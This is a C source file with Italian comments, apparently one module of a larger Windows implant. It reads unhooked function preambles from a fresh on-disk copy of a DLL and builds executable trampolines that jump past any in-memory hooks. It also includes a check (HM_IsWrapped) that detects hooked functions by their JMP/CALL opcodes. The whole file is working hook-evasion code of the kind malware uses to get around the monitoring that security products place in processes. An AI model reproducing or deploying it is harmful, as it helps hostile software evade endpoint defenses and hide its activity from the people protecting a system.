#include <Windows.h>
#include "HM_PreamblePatch.h"
#include "HM_SafeProcedures.h"

// Deve essere globale
LOADED_IMAGE HM_LoadLibrary_li;

// Ritorna il numero di byte letti, oppure 0 in caso di errore.
// La funzione carica e libera (con la NOSTRA HM_LoadLibrary/HM_FreeLibrary)
// la DLL dal disco, la riloca e prende il puntatore alla funzione pFunc.
// In pStub viene messo l'indirizzo di una zona di memoria in cui vengono
// copiati uToRead byte della funzione originale, e sicuramente non hookata,
// e poi viene assemblato un JMP all'indirizzo della DLL originale.
UINT HM_ReadFunction(PCHAR pDll, PCHAR pFunc, UINT uToRead, PBYTE *pStub)
{
	int hMod;
	UINT uCount = 0, uRet;
	PBYTE pPreamble = NULL, pIter = NULL, pCode = NULL;

	if(uToRead == 0 || pDll == NULL || pFunc == NULL)
		return 0;

	hMod = HM_LoadLibrary(pDll);

	if(hMod == 0)
		return 0;

	pIter = pPreamble = (PBYTE)HM_SafeGetProcAddress((HMODULE)hMod, pFunc);

	if(pPreamble == 0){
		HM_FreeLibrary((PVOID)hMod);
		return 0;
	}

	while(uCount < uToRead && uCount < uToRead + BYTE_READ_THRESHOLD){
		uRet = HM_sCodeAlign(pIter);
		uCount += uRet;
		pIter += uRet;
	}

	// +5 perche' dobbiamo allocare anche lo spazio per il JMP di ritorno
	*pStub = (PBYTE)HM_SafeVirtualAllocEx(GetCurrentProcess(), NULL, uCount + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	if(*pStub == 0){
		HM_FreeLibrary((PVOID)hMod);
		return 0;
	}

	uCount = 0;
	pIter = pPreamble;
	pCode = *pStub;

	while(uCount < uToRead && uCount < uToRead + BYTE_READ_THRESHOLD){
		uRet = HM_sCodeAlign(pIter);
		memcpy(pCode, pIter, uRet);
		uCount += uRet;
		pIter += uRet;
		pCode += uRet;
	}

	HM_FreeLibrary((PVOID)hMod);
	HM_AssembleReturnJump(pDll, pFunc, uCount, pCode);

	return uCount;
}

// Torna FALSE in caso di errore, TRUE altrimenti.
// Questa funzione carica pDll, trova l'indirizzo di pFunc e scrive
// dentro pCode un JMP alla libreria originale.
// La libreria caricata non viene intenzionalmente liberata perche'
// comunque verra' usata dal programma.
BOOL HM_AssembleReturnJump(PCHAR pDll, PCHAR pFunc, UINT uDisp, PBYTE pCode)
{
	HMODULE hMod;
	PBYTE func;
	UINT uOffset;
	PUINT uTmp;

	if(pDll == NULL || pFunc == NULL || pCode == NULL)
		return FALSE;

	hMod = LoadLibrary(pDll);

	if(hMod == NULL)
		return FALSE;

	func = (PBYTE)HM_SafeGetProcAddress(hMod, pFunc);

	if(func == NULL)
		return FALSE;

	func += uDisp;
	uOffset = func - pCode - 5;

	*pCode = 0xE9; // JMP
	pCode++;

	uTmp = (UINT *)pCode; // Indirizzo
	*uTmp = uOffset;

	return TRUE;
}

int HM_LoadLibrary(PCHAR pPath)
{
	CHAR name[MAX_PATH + 1] = {0};

	if(MapAndLoad(pPath, NULL, &HM_LoadLibrary_li, TRUE, TRUE) == FALSE)
		return 0;

	// Inizializza il path per la loadDll()
	name[0] = '\\';
	strncat_s(name, MAX_PATH, pPath, strlen(pPath));

	return (int)loadDLL(name);
}

int HM_FreeLibrary(PVOID pPtr)
{
	if(pPtr == NULL)
		return 0;

	VirtualFreeEx(GetCurrentProcess(), pPtr, 0, MEM_RELEASE);

	return UnMapAndLoad(&HM_LoadLibrary_li);
}

BOOL HM_IsWrapped(PCHAR pDll, PCHAR pFunc)
{
	PBYTE func;

	func = (PBYTE)HM_SafeGetProcAddress(GetModuleHandle(pDll), pFunc);

	if(func == NULL || *func == 0xE8 || *func == 0xE9) // JMP e CALL
		return TRUE;

	return FALSE;
}
